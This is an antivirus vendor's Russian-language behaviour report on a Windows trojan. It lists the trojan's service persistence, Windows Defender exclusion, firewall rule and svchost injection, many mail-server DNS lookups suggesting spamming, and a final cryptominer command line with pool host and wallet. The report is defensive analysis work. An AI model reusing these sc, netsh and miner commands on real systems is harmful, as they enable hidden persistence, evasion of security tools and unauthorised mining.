Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\mskdbbsa] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mskdbbsa] 'ImagePath' = '%WINDIR%\SysWOW64\mskdbbsa\gftvjghz.exe /d"<Полный путь к файлу>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\mskdbbsa] 'ImagePath' = '%WINDIR%\SysWOW64\mskdbbsa\gftvjghz.exe'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса с помощью следующих ключей реестра::
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\mskdbbsa' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\gftvjghz.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Перемещает следующие файлы
- %TEMP%\gftvjghz.exe в %WINDIR%\syswow64\mskdbbsa\gftvjghz.exe
Самоудаляется.
Сетевая активность
Подключается к
- 'mt##.##0.yahoodns.net':25
TCP
Запросы HTTP GET
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK ce###ay.co.uk
- DNS ASK sp#####l.cerimay.co.uk
- DNS ASK mo##lix.dk
- DNS ASK re##er.dk
- DNS ASK na##r.com
- DNS ASK mx#.#aver.com
- DNS ASK wi##sa.com
- DNS ASK ti###linet.it
- DNS ASK ec###hare.com
- DNS ASK aa#.dk
- DNS ASK mx#.##ailsrvr.com
- DNS ASK ye###sure.com
- DNS ASK cl######.us.messagelabs.com
- DNS ASK my##t.com
- DNS ASK mb####.mynet.com
- DNS ASK ku##com.net
- DNS ASK mx.#######.net.cust.b.hostedemail.com
- DNS ASK wa##doo.fr
- DNS ASK sm####n.orange.fr
- DNS ASK fl##hnet.it
- DNS ASK in.###babusiness.it
- DNS ASK wm##.com.br
- DNS ASK ph##hvt.com
- DNS ASK mx#######001.gslb.pphosted.com
- DNS ASK my###mail.net
- DNS ASK ca####eremiason.com
- DNS ASK mx#######702.gslb.pphosted.com
- DNS ASK ko##umat.de
- DNS ASK mx##.#spgateway.de
- DNS ASK em##l.com
- DNS ASK mx##.mail.com
- DNS ASK em###tes.net.ae
- DNS ASK dc######.emirates.net.ae
- DNS ASK or####dsgaard.dk
- DNS ASK ex###mobil.com
- DNS ASK ma####.exxonmobil.com
- DNS ASK ad###h.ppg.br
- DNS ASK wa###nhut.com
- DNS ASK mx#.###ntec.iphmx.com
- DNS ASK mx.##oeuro.com
- DNS ASK wd##pp.com
- DNS ASK gw####.fortimail.com
- DNS ASK ti##ali.it
- DNS ASK et###.#ail.tiscali.it
- DNS ASK ji####ilmore.com
- DNS ASK fo##m.dk
- DNS ASK fo####ail.forum.dk
- DNS ASK nc##.edu
- DNS ASK ac###eenergy.ca
- DNS ASK l1#.fi
- DNS ASK so#y.dk
- DNS ASK wm###ero.com
- DNS ASK sp###.#ail.gandi.net
- DNS ASK mx.#.#ocaweb.com.br
- DNS ASK yo####ksofine.eu
- DNS ASK nu###email.com
- DNS ASK mx#.##ukiemail.com
- DNS ASK jr##ods.com
- DNS ASK sm##.##cureserver.net
- DNS ASK bl####nder.co.uk
- DNS ASK mx.##.##mail.iss.as9143.net
- DNS ASK pi###l.com.pk
- DNS ASK ma#####1.pimail.com.pk
- DNS ASK op###line.net
- DNS ASK mx.##timum.net
- DNS ASK mx######91d01.pphosted.com
- DNS ASK bt###ernet.com
- DNS ASK su#####ptions.ahrq.gov
- DNS ASK mx.#####ce.govdelivery.com
- DNS ASK is#.de
- DNS ASK mx##.#nity-mail.com
- DNS ASK ra##ler.ru
- DNS ASK in##.rambler.ru
- DNS ASK ya###.com.br
- DNS ASK ya##o.co.in
- DNS ASK py#.com.co
- DNS ASK ec##es.net
- DNS ASK sp###ify.com
- DNS ASK ya##o.ro
- DNS ASK fr###iernet.net
- DNS ASK at#.com
- DNS ASK a-###cept.co.uk
- DNS ASK it#l.it
- DNS ASK ya###.com.sg
- DNS ASK mx#####.#ail.gm0.yahoodns.net
- DNS ASK co##ast.net
- DNS ASK mx#.#omcast.net
- DNS ASK jp.#bm.com
- DNS ASK sb###obal.net
- DNS ASK ff######x-vip1.prodigy.net
- DNS ASK ho###horse.com
- DNS ASK im###.queen.it
- DNS ASK ma##.surfeu.fi
- DNS ASK su##eu.fi
- DNS ASK ma##.#obbyhorse.com
- DNS ASK ya##o.in
- DNS ASK ge####asouthern.edu
- DNS ASK cn.#bm.com
- DNS ASK ya##o.co.uk
- DNS ASK hu##en.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK go###e.co.uk
- DNS ASK ea#####toremember.com
- DNS ASK sa##ee.com
- DNS ASK gm##l.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK ve##zon.net
- DNS ASK vo#.com
- DNS ASK mx#.free.fr
- DNS ASK fr#e.fr
- DNS ASK de##itte.ca
- DNS ASK mx#.####9-40.ca.iphmx.com
- DNS ASK re#####.lombardia.it
- DNS ASK mi#######2.regione.lombardia.it
- DNS ASK li##ro.it
- DNS ASK sm####n.libero.it
- DNS ASK ho##ail.fr
- DNS ASK ce###ese.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK li#e.de
- DNS ASK ed###dner.com
- DNS ASK ya##o.de
- DNS ASK ba###cum-tv.lt
- DNS ASK ma##.#alticum-tv.lt
- DNS ASK gs.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK ne###ert.com
- DNS ASK ma##.#lient.247.tv
- DNS ASK co###ist.com
- DNS ASK md####oclinic.com
- DNS ASK ma##.##mautoclinic.com
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK li#e.fr
- DNS ASK li######.#lc.protection.outlook.com
- DNS ASK ar#########.mail.protection.outlook.com
- DNS ASK ar#.aon.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK sm####n.virgilio.it
- DNS ASK ho##ail.com
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK al##e.de
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK mx####.#egamailservers.eu
- DNS ASK ya##o.it
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK mi####.bittubeapp.com
- DNS ASK ho###dayisd.net
- DNS ASK ASPMX.L.GOOGLE.COM
- DNS ASK bo###nvw.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK lf#####portes.com.br
- DNS ASK op.pl
- DNS ASK mx.###zta.onet.pl
- DNS ASK vi###tron.ca
- DNS ASK mx.##deotron.ca
- DNS ASK ya##o.com
- DNS ASK vi##ilio.it
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK li##.com
- DNS ASK a4#####.mx.mailhop.org
- DNS ASK fa###ebnet.it
- DNS ASK mx#.##stwebnet.it
- DNS ASK te###stems.com
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK be###rbd.com
- DNS ASK mx#.##rgerbd.com
- DNS ASK th###ware.com
- DNS ASK im##.##inkwaresys.com
- DNS ASK co###serve.com
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK as###.daum.net
- DNS ASK eo###tes.com
- DNS ASK google.com
- DNS ASK uo#.com.br
- DNS ASK us.#bm.com
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK ms#.#inet.net
- DNS ASK ms#####p-mx2.hinet.net
- DNS ASK az##p.vr.it
- DNS ASK qq.com
- DNS ASK mx#.qq.com
- DNS ASK ya##o.es
- DNS ASK wm##pa.com
- DNS ASK mx.##l.com.br
- DNS ASK ac###edt.com
- DNS ASK tr#####lendinggroup.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK pr####2.echoes.net
- DNS ASK st####giclien.com
- DNS ASK me###mclick.com
- DNS ASK so###hoca.com
- DNS ASK no##dr.com
- DNS ASK ua##.edu
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK sr##aw.com
- DNS ASK ar###ours.com
- DNS ASK mx####.##il.am0.yahoodns.net
- DNS ASK st####elegram.com
- DNS ASK ho##ail.de
- DNS ASK d3#####.##s.barracudanetworks.com
- DNS ASK pa##n.com
- DNS ASK st###sline.com
- DNS ASK st###sman.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK st#.com
- DNS ASK ma###chip.com
- DNS ASK ma###.magnachip.com
- DNS ASK la###htime.com
- DNS ASK st##aw.com
- DNS ASK us#######nbound-2.mimecast.com
- DNS ASK ha##ail.net
- DNS ASK mx#.#anmail.net
- DNS ASK mx##.phpnet.org
- DNS ASK mx###.clara.net
- DNS ASK le####rental.co.zw
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\mskdbbsa\gftvjghz.exe' /d"<Полный путь к файлу>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\mskdbbsa\' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\gftvjghz.exe" %WINDIR%\SysWOW64\mskdbbsa\' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' create mskdbbsa binPath= "%WINDIR%\SysWOW64\mskdbbsa\gftvjghz.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' description mskdbbsa "wifi internet conection"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' start mskdbbsa' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\mskdbbsa\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\gftvjghz.exe" %WINDIR%\SysWOW64\mskdbbsa\
- '%WINDIR%\syswow64\sc.exe' create mskdbbsa binPath= "%WINDIR%\SysWOW64\mskdbbsa\gftvjghz.exe /d\"<Полный путь к файлу>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description mskdbbsa "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start mskdbbsa
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' --algo=cn-heavy/tube -o mining.bittubeapp.com:13333 -u bs3GJeLpK9P2RqEpCXWpirL9u7wrGwoPmTJTemNtc7QpSTE24ybGdgtBmXSxhkTitLPyRh8sVz7qmM9TYnhXoZ6G1kARcnhMT.60000 -p x -k
